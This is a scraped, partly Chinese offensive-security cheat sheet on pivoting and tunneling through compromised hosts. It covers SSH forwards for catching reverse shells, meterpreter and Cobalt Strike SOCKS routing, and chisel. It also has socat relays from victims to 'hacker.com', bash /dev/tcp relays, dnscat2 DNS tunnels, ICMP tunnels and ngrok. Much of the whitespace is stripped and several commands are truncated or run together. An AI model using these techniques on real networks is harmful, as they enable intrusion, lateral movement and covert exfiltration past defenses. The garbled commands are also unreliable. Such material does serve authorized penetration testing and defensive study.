# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH 图形连接 (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Local Port2Port
在SSH服务器中打开新端口 --> 其他端口
ssh-R0.0.0.0:10521: port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521: port 1521 accessible in port 10521 from everywhere
本地端口 --> 被攻陷的主机 (SSH) --> 第三方_盒子:端口
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
Port2hostnet (proxychains)
本地端口 --> 被攻陷的主机 (SSH) --> 任何地方
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
这对于通过 DMZ 从内部主机获取反向 shell 到您的主机非常有用:
ssh-idmz_key-R<dmz_internal_ip>:443: Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems# and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 1080">/etc/proxychains.conf#Proxychains
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 1080">/etc/proxychains.conf#Proxychains
beacon> socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker> socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4: ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker> sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090: port 9090 to out port 9090
Windows netsh
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress= Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=
attacker> ruby./dnscat2.rbtunneldomain.comvictim> ./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker> rubydnscat2.rb--dnshost=,port=53,domain=mydomain.local--no-cachevictim> ./dnscat2--dnshost=,port=5353
在两个系统中都需要 root 权限,以创建 tun 适配器并使用 ICMP 回显请求在它们之间隧道数据。
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening ( is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok 是一个通过一条命令行将解决方案暴露到互联网的工具。暴露的 URI 类似于:UID.ngrok.io
创建一个账户: https://ngrok.com/signup
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
# Init configuration, with your token
./ngrok config edit